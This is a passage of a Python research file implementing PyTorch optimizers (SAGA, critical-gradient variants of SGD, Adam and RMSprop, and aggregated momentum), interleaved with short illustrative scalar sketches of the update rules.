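# do, keeps the C gradients with the *smallest* norms: the smallest 1/|g| key
# belongs to the largest-norm entry, so that entry is evicted first. A hedged
# heapq sketch of that selection (the helper name is invented):

```python
import heapq


def keep_bottom_c_by_norm(grads, c):
    """Return the c values with the smallest absolute value, selected by
    pushing inverse-norm keys onto a size-c min-heap."""
    heap = []  # (1/|g|, g) pairs; heap[0] holds the largest-norm survivor
    for g in grads:
        key = 1.0 / abs(g)
        if len(heap) < c:
            heapq.heappush(heap, (key, g))
        elif key > heap[0][0]:
            # new gradient has a smaller norm than the current worst: swap it in
            heapq.heapreplace(heap, (key, g))
    return sorted(g for _, g in heap)
```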
class SAGA(Optimizer):
"""Implement the SAGA optimization algorithm
Original Paper: https://arxiv.org/pdf/1407.0202.pdf
"""
def __init__(self, params, n_samples, lr=0.001):
if n_samples <= 0:
raise ValueError("Number of samples must be >0: {}".format(n_samples))
self.n_samples = n_samples
defaults = dict(lr=lr)
super(SAGA, self).__init__(params, defaults)
self.resetOfflineStats()
def __setstate__(self, state):
super(SAGA, self).__setstate__(state)
def getOfflineStats(self):
return self.offline_grad
def resetOfflineStats(self):
self.offline_grad = {'yes': 0, 'no': 0}
def step(self, index, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
if index < 0.0:
raise ValueError("Invalid index value: {}".format(index))
loss = None
if closure is not None:
loss = closure()
n = self.n_samples
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
d_p = p.grad.data
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
param_state = self.state[p]
if 'gradient_buffer' not in param_state:
buf = param_state['gradient_buffer'] = torch.zeros(n,
*list(d_p.shape))
else:
buf = param_state['gradient_buffer']
                # SAGA update direction: g_new - g_old(i) + mean of stored table
                saga_term = torch.mean(buf, dim=0).to(device)  # mean of stored gradients
                g_i = torch.clone(buf[index]).detach().to(device)  # stale gradient for sample i
                buf[index] = torch.clone(d_p).detach()
                d_p.sub_(g_i).add_(saga_term)
p.data.add_(d_p, alpha=-group['lr'])
return loss
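# The variance-reduction arithmetic of SAGA on scalars, following the update
# in the original paper (g_new - g_old + mean of the stored table). Names here
# are illustrative, and floats stand in for per-parameter gradient tensors.

```python
def saga_scalar_step(p, grad, index, table, lr=0.001):
    """One SAGA update on floats. `table` stores the last gradient seen for
    each sample; the mean is taken over the table *before* it is refreshed."""
    mean_old = sum(table) / len(table)
    g_old = table[index]
    table[index] = grad  # refresh the stored gradient for this sample
    return p - lr * (grad - g_old + mean_old)
```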
class SGD_new_momentum(Optimizer):
"""
Running average (non-decaying) momentum. Never used.
"""
def __init__(self, params, lr=0.001, momentum=0, dampening=0,
weight_decay=0, nesterov=False):
if momentum < 0.0:
raise ValueError("Invalid momentum value: {}".format(momentum))
if weight_decay < 0.0:
raise ValueError("Invalid weight_decay value: {}".format(weight_decay))
defaults = dict(lr=lr, momentum=momentum, dampening=dampening,
weight_decay=weight_decay, nesterov=nesterov)
if nesterov and (momentum <= 0 or dampening != 0):
raise ValueError("Nesterov momentum requires a momentum and zero dampening")
super(SGD_new_momentum, self).__init__(params, defaults)
self.resetOfflineStats()
def __setstate__(self, state):
super(SGD_new_momentum, self).__setstate__(state)
for group in self.param_groups:
group.setdefault('nesterov', False)
def getOfflineStats(self):
return self.offline_grad
def resetOfflineStats(self):
self.offline_grad = {'yes': 0, 'no': 0}
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
weight_decay = group['weight_decay']
momentum = group['momentum']
dampening = group['dampening']
nesterov = group['nesterov']
for p in group['params']:
if p.grad is None:
continue
d_p = p.grad.data
if weight_decay != 0:
                    d_p = d_p.add(p.data, alpha=weight_decay)
if momentum != 0:
param_state = self.state[p]
if 'momentum_buffer' not in param_state:
buf = param_state['momentum_buffer'] = torch.clone(d_p).detach()
n = param_state['buffer_size'] = 1
else:
buf = param_state['momentum_buffer']
                        # persist the incremented count back into the state dict
                        n = param_state['buffer_size'] = param_state['buffer_size'] + 1
buf.add_(d_p, alpha=1 - dampening)
if nesterov:
                        d_p = d_p.add(buf, alpha=momentum)
else:
d_p = torch.clone(buf).detach()
d_p.div_(n)
p.data.add_(d_p, alpha=-group['lr'])
return loss
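# The non-decaying momentum above amounts to stepping along the running mean
# of all (dampened) gradients seen so far. A scalar sketch of that update
# (function and state names are invented; with dampening=0 it matches the
# non-Nesterov path of the class):

```python
def running_mean_momentum_step(p, grad, buf_sum, n, lr=0.001, dampening=0.0):
    """Accumulate the dampened gradient sum and step along its mean."""
    n += 1
    buf_sum += (1.0 - dampening) * grad
    p = p - lr * (buf_sum / n)
    return p, buf_sum, n
```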
class SGD_C_double(Optimizer):
    r"""Implements SGD (optionally with momentum) while keeping a record of critical
    gradients (top C gradients by norm). Adds the sum or mean of these gradients
    to the final update step such that, for parameter p,

        p(t+1) = p(t) - lr * (g_t + f(g_crit))

    where f is either a sum or a mean over the gradients in g_crit.
    The order of computing the update step and updating the buffer is inverted
    relative to the other variants, so the current gradient is double-counted.
    """
def __init__(self, params, lr=0.001, kappa=1.0, dampening=0.,
weight_decay=0, momentum=0., decay=0.99, nesterov=False, topC=10,
sum='sum'):
defaults = dict(lr=lr, kappa=kappa, dampening=dampening,
weight_decay=weight_decay, momentum=momentum, sum=sum,
decay=decay, nesterov=nesterov,
gradHist={}, topC=topC)
if nesterov and (momentum <= 0 or dampening != 0):
raise ValueError("Nesterov momentum requires a momentum and zero dampening")
super(SGD_C_double, self).__init__(params, defaults)
self.resetOfflineStats()
def getOfflineStats(self):
return self.offline_grad
def resetOfflineStats(self):
self.offline_grad = {'yes': 0, 'no': 0}
def __setstate__(self, state):
super(SGD_C_double, self).__setstate__(state)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
weight_decay = group['weight_decay']
kappa = group['kappa']
dampening = group['dampening']
decay = group['decay']
momentum = group['momentum']
# nesterov = group['nesterov']
topc = group['topC']
sum = group['sum']
for p in group['params']:
if p.grad is None:
continue
d_p = p.grad.data
d_p_norm = d_p.norm()
if weight_decay != 0:
d_p = d_p.add(p.data, alpha=weight_decay)
if kappa != 0:
param_state = self.state[p]
if 'critical gradients' not in param_state:
crit_buf = param_state['critical gradients'] = priorityDict()
crit_buf.setHyper(decay_rate=decay, K=topc)
crit_buf[d_p_norm] = deepcopy(d_p)
else:
crit_buf = param_state['critical gradients']
if crit_buf.isFull():
if d_p_norm > crit_buf.pokeSmallest():
self.offline_grad['yes'] += 1
crit_buf[d_p_norm] = deepcopy(d_p)
else:
self.offline_grad['no'] += 1
else:
crit_buf[d_p_norm] = deepcopy(d_p)
d_p = aggregate(d_p, crit_buf, sum, kappa)
crit_buf.decay()
if momentum != 0:
param_state = self.state[p]
if 'momentum_buffer' not in param_state:
buf = param_state['momentum_buffer'] = torch.clone(
d_p).detach()
else:
buf = param_state['momentum_buffer']
buf.mul_(momentum).add_(d_p, alpha=1 - dampening)
d_p = buf
p.data.add_(d_p, alpha=-group['lr'])
return loss
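# Aside (illustration only, not part of the original file): priorityDict is
# defined elsewhere in this module. A minimal, hypothetical sketch of the
# top-C-by-norm behaviour the step() above relies on, using a plain min-heap
# with scalars standing in for gradient tensors:

```python
import heapq

class TopCBuffer:
    """Hypothetical stand-in for priorityDict: keeps the top-C (norm, grad)
    pairs; the smallest stored norm is the eviction candidate, as with
    pokeSmallest() in the code above."""

    def __init__(self, c):
        self.c = c
        self.heap = []  # min-heap of (norm, grad); heap[0] holds the smallest norm

    def offer(self, norm, grad):
        # Mirrors the isFull()/pokeSmallest() admission test in step().
        if len(self.heap) < self.c:
            heapq.heappush(self.heap, (norm, grad))
            return True
        if norm > self.heap[0][0]:
            heapq.heapreplace(self.heap, (norm, grad))
            return True
        return False

    def grad_sum(self):
        return sum(g for _, g in self.heap)

buf = TopCBuffer(2)
buf.offer(3.0, 30.0)
buf.offer(1.0, 10.0)
accepted = buf.offer(2.0, 20.0)  # beats the smallest stored norm, evicting 1.0
```

# With topC=2 the buffer ends up holding the norm-2.0 and norm-3.0 entries.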
class SGD_C_Only(Optimizer):
r"""Implements SGD (optionally with momentum) while keeping a record of critical
gradients (top C gradients by norm). Replaces the gradient in conventional
SGD with either the sum or the mean of critical gradients
Replaces the aggregated gradient with only the critical gradients, i.e. the
current time step's gradient may not come into play.
"""
def __init__(self, params, lr=0.001, kappa=1.0, dampening=0.,
weight_decay=0, momentum=0., decay=0.99, nesterov=False, topC=10,
sum='sum'):
defaults = dict(lr=lr, kappa=kappa, dampening=dampening,
weight_decay=weight_decay, momentum=momentum, sum=sum,
decay=decay, nesterov=nesterov,
gradHist={}, topC=topC)
if nesterov and (momentum <= 0 or dampening != 0):
raise ValueError("Nesterov momentum requires a momentum and zero dampening")
super(SGD_C_Only, self).__init__(params, defaults)
self.resetOfflineStats()
def getOfflineStats(self):
return self.offline_grad
def resetOfflineStats(self):
self.offline_grad = {'yes': 0, 'no': 0}
def __setstate__(self, state):
super(SGD_C_Only, self).__setstate__(state)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
weight_decay = group['weight_decay']
kappa = group['kappa']
dampening = group['dampening']
decay = group['decay']
momentum = group['momentum']
topc = group['topC']
sum = group['sum']
for p in group['params']:
if p.grad is None:
continue
d_p = p.grad.data
d_p_norm = d_p.norm()
crit_buf_ = None
if weight_decay != 0:
d_p = d_p.add(p.data, alpha=weight_decay)
if kappa != 0:
param_state = self.state[p]
if 'critical gradients' not in param_state:
crit_buf = param_state['critical gradients'] = priorityDict()
crit_buf.setHyper(decay_rate=decay, K=topc)
crit_buf[d_p_norm] = deepcopy(d_p)
else:
crit_buf = param_state['critical gradients']
if crit_buf.isFull():
if d_p_norm > crit_buf.pokeSmallest():
self.offline_grad['yes'] += 1
crit_buf[d_p_norm] = deepcopy(d_p)
else:
self.offline_grad['no'] += 1
else:
crit_buf[d_p_norm] = deepcopy(d_p)
if 'sum' in sum:
crit_buf_ = crit_buf.gradSum()
else:
crit_buf_ = crit_buf.gradMean()
crit_buf_.mul_(kappa)
crit_buf.decay()
d_p = crit_buf_
if momentum != 0:
param_state = self.state[p]
if 'momentum_buffer' not in param_state:
buf = param_state['momentum_buffer'] = torch.clone(
d_p).detach()
else:
buf = param_state['momentum_buffer']
buf.mul_(momentum).add_(d_p, alpha=1 - dampening)
d_p = buf
p.data.add_(d_p, alpha=-group['lr'])
return loss
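# Aside (illustration only): aggregate() is defined elsewhere in this module.
# A hypothetical sketch of the combination it is assumed to compute, with
# scalars in place of gradient tensors; the SGD_C_Only update above
# corresponds to dropping the current-gradient term:

```python
def aggregate_sketch(d_p, crit_grads, mode, kappa=1.0):
    """Hypothetical: current gradient plus a kappa-scaled sum or mean of the buffer."""
    agg = sum(crit_grads) if mode == 'sum' else sum(crit_grads) / len(crit_grads)
    return d_p + kappa * agg

crit = [1.0, 2.0, 3.0]
with_sum = aggregate_sketch(0.5, crit, 'sum')    # 0.5 + 6.0 = 6.5
with_mean = aggregate_sketch(0.5, crit, 'mean')  # 0.5 + 2.0 = 2.5
only_crit = aggregate_sketch(0.0, crit, 'mean')  # SGD_C_Only-style update
```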
class Adam_C_double(Optimizer):
r"""
Implementation of Adam with critical gradients.
Replaces current-iteration gradient in conventional PyTorch implementation with
an aggregation of current gradient and critical gradients.
Conventional Adam can be recovered by setting kappa=0.
The critical-gradient-specific keyword parameters are tuned for good
off-the-shelf performance, though additional tuning may be required for best results.
The order of computing the update step and updating the buffer is inverted, leading to double counting.
"""
def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), eps=1e-8, decay=0.95,
kappa=1.0, topC=10,
weight_decay=0, amsgrad=False, sum='sum',
param_level=True): # decay=0.9
if not 0.0 <= lr:
raise ValueError("Invalid learning rate: {}".format(lr))
if not 0.0 <= eps:
raise ValueError("Invalid epsilon value: {}".format(eps))
if not 0.0 <= betas[0] < 1.0:
raise ValueError("Invalid beta parameter at index 0: {}".format(betas[0]))
if not 0.0 <= betas[1] < 1.0:
raise ValueError("Invalid beta parameter at index 1: {}".format(betas[1]))
defaults = dict(lr=lr, betas=betas, eps=eps,
weight_decay=weight_decay, sum=sum, amsgrad=amsgrad,
kappa=kappa, topC=topC, decay=decay, param_level=param_level)
super(Adam_C_double, self).__init__(params, defaults)
self.resetOfflineStats()
def getOfflineStats(self):
return self.offline_grad
def resetOfflineStats(self):
self.offline_grad = {'yes': 0, 'no': 0}
def __setstate__(self, state):
super(Adam_C_double, self).__setstate__(state)
for group in self.param_groups:
group.setdefault('amsgrad', False)
@torch.no_grad()
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data
grad_norm = grad.norm()
if grad.is_sparse:
raise RuntimeError(
'Adam does not support sparse gradients, please consider SparseAdam instead')
amsgrad = group['amsgrad']
kappa = group['kappa']
decay = group['decay']
topc = group['topC']
sum = group['sum']
param_level = group['param_level']
state = self.state[p]
# State initialization
if len(state) == 0:
state['step'] = 0
# Exponential moving average of gradient values
state['exp_avg'] = torch.zeros_like(
p.data) # , memory_format=torch.preserve_format)
# Exponential moving average of squared gradient values
state['exp_avg_sq'] = torch.zeros_like(
p.data) # , memory_format=torch.preserve_format)
if kappa > 0.:
state['critical gradients'] = priorityDict()
state['critical gradients'].setHyper(decay_rate=decay, K=topc)
state['critical gradients'][grad_norm] = deepcopy(grad)
if amsgrad:
# Maintains max of all exp. moving avg. of sq. grad. values
state['max_exp_avg_sq'] = torch.zeros_like(
p.data) # , memory_format=torch.preserve_format)
else:
if kappa > 0.:
if state['critical gradients'].isFull():
if grad_norm > state['critical gradients'].pokeSmallest():
self.offline_grad['yes'] += 1
state['critical gradients'][grad_norm] = deepcopy(grad)
else:
self.offline_grad['no'] += 1
else:
state['critical gradients'][grad_norm] = deepcopy(grad)
exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
if amsgrad:
max_exp_avg_sq = state['max_exp_avg_sq']
beta1, beta2 = group['betas']
state['step'] += 1
bias_correction1 = 1 - beta1 ** state['step']
bias_correction2 = 1 - beta2 ** state['step']
if kappa > 0. and not param_level:
grad = aggregate(grad, state['critical gradients'], sum)
if group['weight_decay'] != 0:
grad = grad.add(p.data, alpha=group['weight_decay'])
# Decay the first and second moment running average coefficient
exp_avg.mul_(beta1).add_(grad, alpha=1 - beta1) # m_t
exp_avg_sq.mul_(beta2).addcmul_(grad, grad, value=1 - beta2) # v_t
if amsgrad:
# Maintains the maximum of all 2nd moment running avg. till now
torch.max(max_exp_avg_sq, exp_avg_sq, out=max_exp_avg_sq)
# Use the max. for normalizing running avg. of gradient
denom = (max_exp_avg_sq.sqrt() / math.sqrt(bias_correction2)).add_(
group['eps'])
else:
denom = (exp_avg_sq.sqrt() / math.sqrt(bias_correction2)).add_(
group['eps'])
step_size = group['lr'] / bias_correction1
if kappa > 0.:  # the critical-gradient buffer only exists when kappa > 0
state['critical gradients'].decay()
if param_level:
exp_avg = aggregate(exp_avg, state['critical gradients'], sum)
p.addcdiv_(exp_avg, denom, value=-step_size)
return loss
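# Aside (illustration only): a scalar version of the Adam update performed
# above for the kappa=0 (conventional Adam) case, mirroring the exp_avg /
# exp_avg_sq moments and the two bias corrections; plain floats stand in for
# parameter tensors.

```python
import math

def adam_step(m, v, grad, t, lr=1e-3, beta1=0.9, beta2=0.999, eps=1e-8):
    m = beta1 * m + (1 - beta1) * grad         # exp_avg
    v = beta2 * v + (1 - beta2) * grad * grad  # exp_avg_sq
    bc1 = 1 - beta1 ** t                       # bias_correction1
    bc2 = 1 - beta2 ** t                       # bias_correction2
    denom = math.sqrt(v) / math.sqrt(bc2) + eps
    return m, v, (lr / bc1) * m / denom

m, v, upd = adam_step(0.0, 0.0, grad=0.5, t=1)  # first step has magnitude ~lr
```

# The bias corrections cancel the zero-initialization of both moments, so the
# very first update already has magnitude close to the learning rate.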
class RMSprop_C_double(Optimizer):
r"""Implementation of RMSprop with critical gradients.
Replaces current-iteration gradient in conventional PyTorch implementation with
an aggregation of current gradient and critical gradients.
Conventional RMSprop can be recovered by setting kappa=0.
The critical-gradient-specific keyword parameters are tuned for good
off-the-shelf performance, though additional tuning may be required for best results.
The order of computing the update step and updating the buffer is inverted, leading to double counting.
"""
def __init__(self, params, lr=1e-2, alpha=0.99, eps=1e-8, weight_decay=0,
momentum=0, centered=False, decay=0.95,
kappa=1.0, topC=10, sum='sum'):
if not 0.0 <= lr:
raise ValueError("Invalid learning rate: {}".format(lr))
if not 0.0 <= eps:
raise ValueError("Invalid epsilon value: {}".format(eps))
if not 0.0 <= momentum:
raise ValueError("Invalid momentum value: {}".format(momentum))
if not 0.0 <= weight_decay:
raise ValueError("Invalid weight_decay value: {}".format(weight_decay))
if not 0.0 <= alpha:
raise ValueError("Invalid alpha value: {}".format(alpha))
defaults = dict(lr=lr, momentum=momentum, alpha=alpha, eps=eps,
centered=centered, weight_decay=weight_decay,
sum=sum, kappa=kappa, topC=topC, decay=decay)
super(RMSprop_C_double, self).__init__(params, defaults)
self.resetOfflineStats()
def __setstate__(self, state):
super(RMSprop_C_double, self).__setstate__(state)
for group in self.param_groups:
group.setdefault('momentum', 0)
group.setdefault('centered', False)
@torch.no_grad()
def step(self, closure=None):
"""Performs a single optimization step.
Args:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
with torch.enable_grad():
loss = closure()
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad
grad_norm = grad.norm()
if grad.is_sparse:
raise RuntimeError('RMSprop does not support sparse gradients')
kappa = group['kappa']
decay = group['decay']
topc = group['topC']
sum = group['sum']
state = self.state[p]
# State initialization
if len(state) == 0:
state['step'] = 0
state['square_avg'] = \
torch.zeros_like(p, memory_format=torch.preserve_format)
if group['momentum'] > 0:
state['momentum_buffer'] = \
torch.zeros_like(p, memory_format=torch.preserve_format)
if group['centered']:
state['grad_avg'] = \
torch.zeros_like(p, memory_format=torch.preserve_format)
if kappa > 0.:
state['critical gradients'] = priorityDict()
state['critical gradients'].setHyper(decay_rate=decay, K=topc)
state['critical gradients'][grad_norm] = deepcopy(grad)
else:
if kappa > 0.:
if state['critical gradients'].isFull():
if grad_norm > state['critical gradients'].pokeSmallest():
self.offline_grad['yes'] += 1
state['critical gradients'][grad_norm] = deepcopy(grad)
else:
self.offline_grad['no'] += 1
else:
state['critical gradients'][grad_norm] = deepcopy(grad)
square_avg = state['square_avg']
alpha = group['alpha']
state['step'] += 1
if kappa > 0.:
grad = aggregate(grad, state['critical gradients'], sum)
if group['weight_decay'] != 0:
grad = grad.add(p, alpha=group['weight_decay'])
square_avg.mul_(alpha).addcmul_(grad, grad, value=1 - alpha)
if group['centered']:
grad_avg = state['grad_avg']
grad_avg.mul_(alpha).add_(grad, alpha=1 - alpha)
avg = square_avg.addcmul(grad_avg, grad_avg, value=-1).sqrt_().add_(
group['eps'])
else:
avg = square_avg.sqrt().add_(group['eps'])
if kappa > 0.:  # the critical-gradient buffer only exists when kappa > 0
state['critical gradients'].decay()
if group['momentum'] > 0:
buf = state['momentum_buffer']
buf.mul_(group['momentum']).addcdiv_(grad, avg)
p.add_(buf, alpha=-group['lr'])
else:
p.addcdiv_(grad, avg, value=-group['lr'])
return loss
def getOfflineStats(self):
return self.offline_grad
def resetOfflineStats(self):
self.offline_grad = {'yes': 0, 'no': 0}
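# Aside (illustration only): a scalar version of the RMSprop update performed
# above for the kappa=0, momentum=0, non-centered case, mirroring
# square_avg.mul_(alpha).addcmul_(grad, grad, value=1 - alpha).

```python
import math

def rmsprop_step(square_avg, grad, lr=1e-2, alpha=0.99, eps=1e-8):
    square_avg = alpha * square_avg + (1 - alpha) * grad * grad
    return square_avg, lr * grad / (math.sqrt(square_avg) + eps)

sq, upd = rmsprop_step(0.0, grad=2.0)
```

# Dividing by the root of the running squared-gradient average rescales the
# step, so a large gradient does not translate into a proportionally large update.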
class AggMo_custom(Optimizer):
"""
Custom Implementation of the AggMo optimizer. Not used in favor of original version.
"""
def __init__(self, params, lr=0.001, momenta=[], dampening=0,
weight_decay=0):
if any(momentum < 0.0 for momentum in momenta):
raise ValueError("Invalid momentum value: at least one value is negative")
if weight_decay < 0.0:
raise ValueError("Invalid weight_decay value: {}".format(weight_decay))
defaults = dict(lr=lr, momenta=torch.tensor(momenta).to(device),
dampening=dampening,
weight_decay=weight_decay)
super(AggMo_custom, self).__init__(params, defaults)
self.resetOfflineStats()
def __setstate__(self, state):
super(AggMo_custom, self).__setstate__(state)
for group in self.param_groups:
group.setdefault('nesterov', False)
def getOfflineStats(self):
return self.offline_grad
def resetOfflineStats(self):
self.offline_grad = {'yes': 0, 'no': 0}
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
weight_decay = group['weight_decay']
momenta = group['momenta']
dampening = group['dampening']
for p in group['params']:
if p.grad is None:
continue
d_p = p.grad.data
if weight_decay != 0:
d_p = d_p.add(p.data, alpha=weight_decay)
if len(momenta) != 0 and all(momentum != 0.0 for momentum in momenta):
param_state = self.state[p]
if 'momentum_buffer' not in param_state:
buf = param_state['momentum_buffer'] = torch.stack(
[torch.clone(d_p).detach()] * len(momenta))
vec = param_state['momentum'] = torch.clone(momenta)
while vec.dim() < buf.dim(): vec.unsqueeze_(1)
else:
buf = param_state['momentum_buffer']
vec = param_state['momentum']
buf.mul_(vec)
buf.add_(d_p, alpha=1 - dampening)
d_p = torch.mean(buf, dim=0)
p.data.add_(d_p, alpha=-group['lr'])
return loss
class SGD_C_HIST(Optimizer):
"""
Implementation of SGD (and optionally SGD with momentum) with critical gradients.
Replaces current-iteration gradient in conventional PyTorch implementation with
an aggregation of current gradient and critical gradients.
Conventional SGD or SGD with momentum can be recovered by setting kappa=0.
The critical-gradient-specific keyword parameters are tuned for good off-the-shelf
performance, though additional tuning may be required for best results.
This version of SGD_C is designed to maintain each gradient's age and can be used to
generate histograms.
"""
def __init__(self, params, lr=0.001, kappa=1.0, dampening=0.,
weight_decay=0, momentum=0.,
decay=0.7, topC=10, aggr='sum'):
if momentum < 0.0:
raise ValueError("Invalid momentum value: {}".format(momentum))
if weight_decay < 0.0:
raise ValueError("Invalid weight_decay value: {}".format(weight_decay))
if not 0.0 <= decay < 1.0:
raise ValueError("Invalid decay value: {}".format(decay))
if not 0.0 <= topC:
raise ValueError("Invalid topC value: {}".format(topC))
defaults = dict(lr=lr, kappa=kappa, dampening=dampening,
weight_decay=weight_decay, momentum=momentum,
aggr=aggr, decay=decay, gradHist={}, topC=topC)
super(SGD_C_HIST, self).__init__(params, defaults)
self.resetOfflineStats()
self.resetAnalysis()
self._age_at_removal = []
self._age_at_epoch_end = []
def getOfflineStats(self):
return self.offline_grad
def getAnalysis(self):
return self.g_analysis
def resetAnalysis(self):
self.g_analysis = {'gt': 0., 'gc': 0., 'count': 0}
def resetOfflineStats(self):
self.offline_grad = {'yes': 0, 'no': 0}
def __setstate__(self, state):
super(SGD_C_HIST, self).__setstate__(state)
def get_ages(self):
return (self._age_at_removal, self._age_at_epoch_end)
def epoch(self):
param_state = self.state[
self.param_groups[0]['params'][0]] # This is gross but it works
crit_buf = param_state['critical gradients']
epoch_ages = crit_buf.epoch()
for age in epoch_ages:
self._age_at_epoch_end.append(age)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
weight_decay = group['weight_decay']
kappa = group['kappa']
dampening = group['dampening']
decay = group['decay']
momentum = group['momentum']
topc = group['topC']
aggr = group['aggr']
total_norm = 0.0
age_to_keep = 0.0
for p in group['params']:
if p.grad is None:
continue
d_p = p.grad.data
total_norm += torch.sqrt(torch.sum(torch.square(d_p)))
for p in group['params']:
if p.grad is None:
continue
d_p = p.grad.data
if weight_decay != 0:
d_p = d_p.add(p.data, alpha=weight_decay)
if kappa != 0:
param_state = self.state[p]
if 'critical gradients' not in param_state:
crit_buf = param_state['critical gradients'] = priorityDict()
crit_buf.setHyper(decay_rate=decay, K=topc, hist=True)
crit_buf[total_norm] = deepcopy(d_p)
else:
crit_buf = param_state['critical gradients']
aggr_grad = aggregate(d_p, crit_buf, aggr, kappa)
if crit_buf.isFull():
if total_norm > crit_buf.pokeSmallest():
self.offline_grad['yes'] += 1
age_to_keep = crit_buf.pokeSmallestAge()
crit_buf[total_norm] = deepcopy(d_p)
else:
self.offline_grad['no'] += 1
else:
crit_buf[total_norm] = deepcopy(d_p)
d_p = aggr_grad
self.g_analysis['gc'] += crit_buf.averageTopC()
self.g_analysis['count'] += 1
self.g_analysis['gt'] += p.grad.data.norm()
crit_buf.decay()
crit_buf.step()
if momentum != 0:
param_state = self.state[p]
if 'momentum_buffer' not in param_state:
buf = param_state['momentum_buffer'] = torch.clone(
d_p).detach()
else:
buf = param_state['momentum_buffer']
buf.mul_(momentum).add_(d_p, alpha=1 - dampening)
d_p = buf
p.data.add_(d_p, alpha=-group['lr'])
if age_to_keep > 0:
self._age_at_removal.append(age_to_keep)
return loss
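# Aside (illustration only): a hypothetical sketch of the age bookkeeping the
# HIST variant relies on. Each buffer entry carries a step counter; when an
# entry is evicted by a larger-norm gradient, its age at removal is recorded
# (the source of the _age_at_removal histogram data above).

```python
class AgedBuffer:
    """Hypothetical stand-in: top-C scalar norms with per-entry step counters."""

    def __init__(self, c):
        self.c = c
        self.entries = []          # (norm, age) pairs
        self.ages_at_removal = []

    def step(self):
        # Every surviving entry gets one step older, as with crit_buf.step().
        self.entries = [(n, age + 1) for n, age in self.entries]

    def offer(self, norm):
        if len(self.entries) < self.c:
            self.entries.append((norm, 0))
            return
        smallest = min(self.entries, key=lambda e: e[0])
        if norm > smallest[0]:
            self.entries.remove(smallest)
            self.ages_at_removal.append(smallest[1])  # age at eviction
            self.entries.append((norm, 0))

buf = AgedBuffer(2)
buf.offer(1.0); buf.step()
buf.offer(3.0); buf.step()
buf.offer(2.0)  # evicts the norm-1.0 entry, which survived two steps
```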
class AggMo(Optimizer):
r"""Implements Aggregated Momentum Gradient Descent
Original Paper: https://arxiv.org/pdf/1804.00325.pdf
Code: https://github.com/AtheMathmo/AggMo
"""
def __init__(self, params, lr=0.1, betas=[0.0, 0.9, 0.99], weight_decay=0):
defaults = dict(lr=lr, betas=betas, weight_decay=weight_decay)
super(AggMo, self).__init__(params, defaults)
self.resetOfflineStats()
self.resetAnalysis()
def getOfflineStats(self):
return self.offline_grad
def getAnalysis(self):
return self.g_analysis
def resetAnalysis(self):
self.g_analysis = {'gt': 0., 'gc': 0., 'count': 0}
def resetOfflineStats(self):
self.offline_grad = {'yes': 0, 'no': 0}
@classmethod
def from_exp_form(cls, params, lr=0.1, a=0.1, k=3, weight_decay=0):
betas = [1 - a ** i for i in range(k)]
return cls(params, lr, betas, weight_decay)
def __setstate__(self, state):
super(AggMo, self).__setstate__(state)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
weight_decay = group['weight_decay']
betas = group['betas']
total_mom = float(len(betas))
for p in group['params']:
if p.grad is None:
continue
d_p = p.grad.data
if weight_decay != 0:
d_p.add_(p.data, alpha=weight_decay)
param_state = self.state[p]
if 'momentum_buffer' not in param_state:
param_state['momentum_buffer'] = {}
for beta in betas:
param_state['momentum_buffer'][beta] = torch.zeros_like(p.data)
for beta in betas:
buf = param_state['momentum_buffer'][beta]
# import pdb; pdb.set_trace()
buf.mul_(beta).add_(d_p)
p.data.sub_(buf, alpha=group['lr'] / total_mom)
return loss
def zero_momentum_buffers(self):
for group in self.param_groups:
betas = group['betas']
for p in group['params']:
param_state = self.state[p]
param_state['momentum_buffer'] = {}
for beta in betas:
param_state['momentum_buffer'][beta] = torch.zeros_like(p.data)
def update_hparam(self, name, value):
for param_group in self.param_groups:
param_group[name] = value
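# Aside (illustration only): the exponential form used by from_exp_form above,
# betas = [1 - a ** i for i in range(k)], and one scalar AggMo update. Every
# buffer does buf = beta * buf + d_p, and the parameter moves by
# -(lr / K) * sum(bufs), i.e. lr times the mean of the K momentum buffers.

```python
a, k = 0.1, 3
betas = [1 - a ** i for i in range(k)]  # approximately [0.0, 0.9, 0.99]

bufs = [0.0] * k
d_p = 1.0
bufs = [beta * buf + d_p for beta, buf in zip(betas, bufs)]
avg_update = sum(bufs) / len(bufs)  # the step scales this mean by lr
```

# On the first step all buffers equal d_p, so the averaged update matches
# plain SGD; the betas only start to differentiate the buffers on later steps.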
class AggMo_C(Optimizer):
r"""Implements Aggregated Momentum Gradient Descent
Replaces AggMo's computation of several SGDM steps with SGDM_C steps
"""
def __init__(self, params, lr=0.1, betas=[0.0, 0.9, 0.99], weight_decay=0,
dampening=0.0, decay=0.7, topC=10,
aggr='sum',
sampling=None, critical_test=True, kappa=1.0):
if any(momentum < 0.0 for momentum in betas):
raise ValueError("Invalid beta value: at least one value is negative")
if weight_decay < 0.0:
raise ValueError("Invalid weight_decay value: {}".format(weight_decay))
if not 0.0 <= decay < 1.0:
raise ValueError("Invalid decay value: {}".format(decay))
if not 0.0 <= topC:
